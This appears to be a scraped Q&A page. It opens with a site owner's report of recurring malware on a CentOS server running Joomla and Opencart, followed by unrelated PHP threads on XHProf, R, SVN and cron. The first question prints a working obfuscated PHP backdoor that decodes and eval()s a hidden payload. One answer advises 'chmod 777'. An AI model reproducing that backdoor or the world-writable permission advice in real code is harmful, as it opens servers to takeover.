We have AWS ec2 instance with CentOs. There are 4 sites hosted on this instance, one static HTML and PHP site, two Joomla (v3.4.5), one Opencart (v2.0.1.1).
Yesterday we found few files which are not related to our codebase, seems malware. We executed egrep -Rl 'function.*for.*strlen.*isset' /home/ and found that there are few files with following sample code.
<?php
function rjlynu($vkofjapoz, $avsepejks){$gjcdh = ''; for($i=0; $i < strlen($vkofjapoz); $i++){$gjcdh .= isset($avsepejks[$vkofjapoz[$i]]) ? $avsepejks[$vkofjapoz[$i]] : $vkofjapoz[$i];}
$jcmkpl="base64_decode";return $jcmkpl($gjcdh);}
$fkcrhcwlxx = 'KAYS3ymsuxKqMLBk10JIDxYauxMVX0MsMVddThITKAYS3ymsuxKqML5HupmY18MH18F8EcNkldkNuxMV'.
'X0Ma1fydX0MQ3Z98TcNkldkN1LyQx0BkXZyaXAYC3xKqF4bn4bJkuL9H1fyatxG'.
'Y1YmPDfmVt4w5ThITKAYS3ymsuxKqMLpP26mY2Ay7txBkXL9atAYCuz1IF4bn4wkkueNqtfyV1'.
'LYHXYm7XLpdDxMYT6JOR6mZByMhzRmlE4N8GzrdE7N8E4N8v41kO4bw2dqw'.
'O4BVuxFwvzJJ18MP2zwkldqwO4BVuxGXO8MY10yIt4MtZVM73Ay73VMtOcQwFcITO4JYDLPHOAMP1LRLG6mYXf'.
'GHuARq1LyV3Z6I3xkYT4BVuxFkThITaKqTu8ySD0BkXLrwD0ystAmCx0GQ1fYdx0BPu0FqMiBY2'.
'iKk48ITO4NwO4BQuxPQOcQw10BV3xJatA681VwbtAyrt4dwMs5Pve'.
'1kldqTO4NwO4BQuxPQOcQw10BVx0MY1A5PDLRqO75POAPVuZDmx4OeE4NeZVNeE4NbtAyrt4'.
'bn4eNwO4NbtAyrt4NmOiGQ1YmVuxJIDZGYT4OWELU+OedwOeOIO4BQuxPQThITO4NwO4BQ'.
'uxPQOcQw10BVx0MY1A5PDLRqOYdeveOIO4OwxzNeE4NbtAyrt4bn4wqwO4Nw1fyQtxMSO4BQux'.
'PQldkm4wk7XA6s1VJhhyBKOiITO4JdtZMI3ZFwM6GGy6JaRUmzy4NmOcOpldqwOiJpDf5kDVNbKpMFBe'.
'NmO4M11Y5SO7ITO4JdtZMI3ZFwMABHxLBYD8y8OcQwFcITO4JdtZMI'.
'3ZFwMUBYD8y8X0yQ1iyQO4NwO4NmO4tYDLPHMsITO4JdtZMI3ZFwMABHx0uY18NwvzJfDZ5suhITO4JdtZMI3ZFwM6BkXZyHtxK'.
'wO4NwO4NwO4NmOcUpldqwOiJpDf5kDVNbyAYCuZ5kXZYQO4NwO'.
'MY10yIt4MtZVM73Ay73VMtOcQwFhIT4fy73AWwDf6suhDQxLySDLmbuzPsuxMkDZ5k2fRqMiMY1VbkldqTu'.
'xPkt4wkld==';
$ghjnzmrjlg = Array('1'=>'c', '0'=>'3', '3'=>'a', '2'=>'e', '5'=>'x', '4'=>'C', '7'=>'j', '6'=>'F', '9'=>'5', '8'=>'n', 'A'=>'G', 'C'=>'t', 'B'=>'R', 'E'=>'L', 'D'=>'Y', 'G'=>'N', 'F'=>'M', 'I'=>'s', 'H'=>'v', 'K'=>'Q', 'J'=>'B', 'M'=>'J', 'L'=>'2', 'O'=>'I', 'N'=>'A', 'Q'=>'0', 'P'=>'h', 'S'=>'u', 'R'=>'U', 'U'=>'E', 'T'=>'K', 'W'=>'8', 'V'=>'y', 'Y'=>'l', 'X'=>'b', 'Z'=>'W', 'a'=>'f', 'c'=>'D', 'b'=>'k', 'e'=>'i', 'd'=>'w', 'g'=>'6', 'f'=>'m', 'i'=>'H', 'h'=>'T', 'k'=>'p', 'j'=>'r', 'm'=>'9', 'l'=>'O', 'o'=>'q', 'n'=>'7', 'q'=>'o', 'p'=>'1', 's'=>'z', 'r'=>'4', 'u'=>'Z', 't'=>'d', 'w'=>'g', 'v'=>'P', 'y'=>'V', 'x'=>'X', 'z'=>'S');
eval(rjlynu($fkcrhcwlxx, $ghjnzmrjlg));?>
Even if we remove these files, they get created again and again.
What could be the issue? How can we find the root cause behind this and what is the permanent solution?
Thanks
lookup access log i believe they are located here /var/log/apache2/access.log
i would also check the folder permission make sure its not something like 777. i would also check for the processes using the ps command from ssh to watch the processes that are running.
i also would make sure to run ClamAV. before all of that i would also make backups of all of the sites and upgrade every plugin you have installed.
good luck with your server.
Related
I have installed the Drupal XHProf 7.x-1.0-beta2 module and enabled it on the Modules page of my site.
I have turned enabled the use of the module at Configuration -> Development -> XHProf settings (/admin/config/development/xhprof) by checking ON " Enable profiling of all page views and drush requests. "
Now what?
When I visit a page and click "XHProf output" at the bottom of the page, I get this error:
" Run #51b789ae8cea0: Invalid Run Id = 51b789ae8cea0 "
And the list of the "Top 100 functions" is totally empty. I am a bit lost as to what I should be seeing or where to go from here. Any help greatly appreciated.
please refer error screenshot
Go to your backend folder structure.create a folder named xhprof in your server, inside tmp folder in your server like 10.20.4.123/tmp
on clicking "XHProf output" at the bottom of the page.it will display output.
Looking at the code that returns this error it's a file exists check. I changed $run_desc to output the full filename vs the run id.
if (!file_exists($file_name)) {
xhprof_error("Could not find file $file_name");
$run_desc = "Invalid Run Id = $file_name";
return null;
}
In my case for a run id of 617064cfe0f71 it was looking for a filename formatted like
617064cfe0f71.xhprof.xhprof
The filename is derived from this function
private function file_name($run_id, $type) {
$file = "$run_id.$type." . $this->suffix;
...
}
It's a permission issue,just set chmod 777 for your xhprof output directory.
I am trying to run a R script from PHP, and in R script, I will create test.jpg image, and in PHP, I will display this image on web.
The R is 2.11.1 and OS is Ubuntu 10.10.
The problem is: this .jpg is created successfully if I run from terminal, but no image created if I run from WebUI. I run the script from terminal and WebUI in the same directory. /opt/lampp/htdocs/name/. (If somebody can tell me a good tool to debug this WebUI, it would be great. I put some echo in the .php file, I see the functions being called, but still do not know how to solve this bug).
The .jpg is created when I run from terminal:
php r_caller.php
In this r_caller.php, I have simple function as:
<?php php_call_r(){
$cmd = "echo 'argv <- \"r_command.r\"; source(argv)' | " .
"/usr/bin/R --vanilla --slave";
$ret = system($cmd);
echo $ret;}
?>
and this php_call_r function is called in the same file as r_caller.php:
<?php
//some irrelavant codes above
php_call_r();
print("<img src=test.jpg>");
?}
and in the r_command.r script, I have simple commands as:
jpeg("test.jpg")
plot(50, 50)
dev.off()
I really appreciate your help!
You did not specify your platform and R version, but on unix the jpeg() device may require X11 to render the image (which you may have in your interactive session but not in apache). You may be better off using the Cairo package or other means that don't require X11 session (recent R allows you to use alternative types in the jpeg call which you can also try - see ?jpeg).
(As a side note there is a PHP client to Rserve which makes web requests much faster - running R itself is pretty much the slowest way to use R from PHP. If you don't want to install any packages then you may want to use at least Rscript)
Edit: Now that you have added the R version - that's a really ancient one, you should seriously consider upgrading it. You can try installing Cairo with that old R version, but you may possibly need to go back there as well.
One more thing to consider, check you file privileges - make sure www-data has write-permissions wherever you will be creating the file (e.g., see echo system("pwd"); for the current directory R will be run in).
Check the Apache error logs to see if there are any errors. Try adding the following to the beginning of your PHP code:
error_reporting(E_ALL);
ini_set('display_errors','On');
This might be a copy/paste error, but your php_call_r function is not properly defined as a function. I suggest the following:
<?php function php_call_r() {
$cmd = "echo 'argv <- \"r_command.r\"; source(argv)' | " .
"/usr/bin/R --vanilla --slave";
$ret = system($cmd);
echo $ret;
}
?>
Executing R from PHP for each request is a very bad idea -- PHP piping is usually not reliable and R's output is optimized for interactive work rather than transmitting results. Moreover R starts for ages, so you waste lots of time and CPU power.
The better idea is to use R worker daemon, created by either Rserve or triggr -- Rserve has PHP client, for triggr you need to cook one on your own, but it is trivial; it may look like this:
R part (r.R)
require(triggr);
serve(function(data_from_php){
cat(sprintf("Called with: %s\n",data_from_php));
#<<Picture creation code>>
#Break connection notifying PHP that picture is done
return(endConnection("Done\r\n"));
},9090);
# ^- Port you want to use for internal communication
PHP part
<?php
$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
echo "Connecting...\n";
if(socket_connect($s,"localhost",9090)){
echo "Connected!\n"; //v double \r\n is crucial
$d="some data for R\r\n\r\n";
socket_write($s,$d,strlen($d));
//This blocks until picture is done
$r=socket_read($s,6);
//Here we can emit the page featuring <img>
echo "Response was $r\n";
}
?>
Now you just fire r.R in background or under some auto-resurrection daemon and you are done.
I want to put an auto-incremental build number in my PHP-based web application.
Since I'm not compiling, but I'm using svn for source control, I thought that maybe each checkout could count as a build.
Am I right?
If so, how can I get the current svn revision number of the production server local copy via PHP?
If not, what would you say is the best method to put an auto-incremental build number in a web app?
Not used SVN for a long time, but this should work.
$var = '$Id:$';
SVN replaces $Id:$ on every checkout
Update: Seems, that $Rev:$ is more convenient.
I think Getting the last revision number in SVN? might answer your question!
I found this How can I get the svn revision number in PHP?
Where somebody says that on the deployment script you can include:
cd /var/www/project
svn update
rm version.php
svnversion > version.php
To fill version.php with the current svn version.
Then, you include version.php where you need it.
Also, I found this, that seems to work without updating a specific file:
$path='path_to_your_project';
function get_svn_revision ($path)
{
$cmd = 'svnversion -n ' . $path;
$result = (int)exec ($cmd);
return $result;
}
But since I didn't want to execute a command, I ended up querying /.svn/entries at the root of the project using:
$path='path_to_your_project';
function get_svn_revision($path) {
$svn = File($path . '/.svn/entries');
//Revision number is the fourth line
$result = $svn[3];
unset($svn);
return $result;
}
This is the first time I've ever used a CRON.
I'm using it to parse external data that is automatically FTP'd to a subdirectory on our site.
I have created a controller and model which handles the data. I can access the URL fine in my browser and it works (however I will be restricting this soon).
My problem is, how can I test if it's working?
I've added this to my controller for a quick and dirty log
$file = 'test.txt';
$contents = '';
if (file_exists($file)) {
$contents = file_get_contents($file);
}
$contents .= date('m-d-Y') . ' --- ' . PHP_SAPI . "\n\n";
file_put_contents($file, $contents);
But so far only got requests logged from myself from the browser, despite having my CRON running ever minute.
03-18-2010 --- cgi-fcgi
03-18-2010 --- cgi-fcgi
I've set it up using cPanel with the command
index.php properties/update/
the 2nd portion is what I use to access the page in my browser.
So how can I test this is working properly, and have I stuffed anything up?
Note: I'm using Kohana 3.
Many thanks
You're not using the correct command for calling Kohana.
Make sure you're using the full path to index.php so you can eliminate any path errors. Here are the switches available for use in Kohana:
--uri: Self explanatory
--method: HTTP Request method (POST, GET, etc ...) (Overrides Kohana::$method)
--get: Formatted GET data
--post: Formatted POST data
You should be using something like this:
php /path/to/kohana/directory/index.php --uri=properties/update/
I can't remember if you need double quotes around the value, don't forget to try that if it doesn't work.
you probably aren't running Cron with root permissions on that file.
put mailto="youremail#yourdomain.tld" at the start of the cron file to have it email you errors.
If you don't have root access to the cron file (I.E. SSH) I don't know if you can do this in cPanel.
I was needing a way to generate thumbnails (using PHP5) for an image management script and had a problem where my host has multiple versions of PHP installed (4 and 5), with PHP4 set as default. This meant that any calls to php from the CLI would run PHP4. I've come up with the following as what I hope to be a cross platform solution. I'm posting it here primarily as I had a lot of trouble finding any help using Google, so this might help someone in the future, I also have the following questions.
Do you see anything obviously wrong with it?
Are there any other paths to the php5 binary that you know of or know of a better order to have the array for optimisation?
If a host has exec or shell_exec disabled, will the EGalleryProcessQueue.php script be able to be run as a standalone cron job? I don't have access to cron to be able to test this yet. I'm not too worried about this question, as I'll get around to testing it eventually anyway.
Does anyone have any suggestions as to a way in which I can get some feedback as to how far through the images the processing is? See the TODO section of EGalleryProcessQueue.php I'd like to display a progress bar when it's in the admin section.
Main script
/**
* Writes the array to a text file in /path/to/gallery/needsThumbs.txt for batch processing.
* Runs the thumbnail generator script in the background.
*
* #param array $_needsThumbs the array of images needing thumbnails
*/
private function generateThumbnails($_needsThumbs)
{
file_put_contents($this->_realpath.DIRECTORY_SEPARATOR.'needsThumbs.txt',serialize($_needsThumbs));
$Command = realpath(dirname(__FILE__)).DIRECTORY_SEPARATOR.'EGalleryProcessQueue.php '.$this->_realpath.' '.$this->thumbnailWidth.' '.$this->thumbnailHeight;
if(PHP_SHLIB_SUFFIX == 'so')// *nix (aka NOT windows)
{
/*
* We need to make sure we are using the right PHP version
* (problems with shared hosts that have PHP4 and PHP5 installed,
* but PHP4 set as default).
*/
$phpPaths = array('php', '/usr/local/bin/php', '/usr/local/php5/bin/php', '/usr/bin/php', '/usr/bin/php5');
foreach($phpPaths as $path)
{
exec("echo '<?php echo version_compare(PHP_VERSION, \"5.0.0\", \">=\"); ?>' | $path", $result);
if($result)
{
shell_exec("nohup $path $Command 2> /dev/null > /dev/null &");
break;
}
}
}
else // Windows
{
$WshShell = new COM("WScript.Shell");
$WshShell->Run("php.exe $Command", 0, false);
}
}
EGalleryProcessQueue.php
#!/usr/bin/php
<?php
if ($argc === 4 && strstr($argv[0], basename(__FILE__))) {
// File is being called by the CLI and has not been included by another script
if(!file_exists($argv[1].DIRECTORY_SEPARATOR.'needsThumbs.txt'))
{
// Either no thumbnails need to be created or a wrong directory has been supplied
exit;
}
include(realpath(dirname(__FILE__)).DIRECTORY_SEPARATOR.'EGalleryThumbGenerator.php');
$generator = new EGalleryThumbGenerator;
$generator->directory = $argv[1];
$generator->thumbnailWidth = is_int($argv[2]) ? $argv[2] : 128;
$generator->thumbnailHeight = is_int($argv[3]) ? $argv[3] : 128;
// $generator->processImages() returns the number of images left to process (it does them in blocks of 10)
while (($i = $generator->processImages()) > 0)
{
/*
* TODO Can we get some sort of feedback to the user here?
* Possibly so that we can display a progress bar in the management section.
* Probably have to write $i to a file to be read by the main script.
*/
}
exit;
}
?>
Do you see anything obviously wrong with it?
Nope, the code looks good.
Are there any other paths to the php5 binary that you know of or know of a better order to have the array for optimization?
This is a hard question to answer, as PHP could be installed anywhere on a server. The paths you have seem to be very logical to me, but there could be any number of other places it could be installed.
Rather than providing a bunch of directories where PHP5 might be installed, what about having a parameter the user has to set to provide the path to the PHP5 executable if it's not in their $PATH?
If a host has exec or shell_exec disabled, will the EGalleryProcessQueue.php script be able to be run via a cron job?
I haven't tested it, but I would assume that would prevent the script from running.
Does anyone have any suggestions as to a way in which I can get some feedback as to how far through the images the processing is? See the TODO section of EGalleryProcessQueue.php I'd like to display a progress bar when it's in the admin section.
Store the number of images completed somewhere (file, db, maybe even session var) and have an AJAX call fire every second or so to a function that provides done vs total. Then use something like http://docs.jquery.com/UI/Progressbar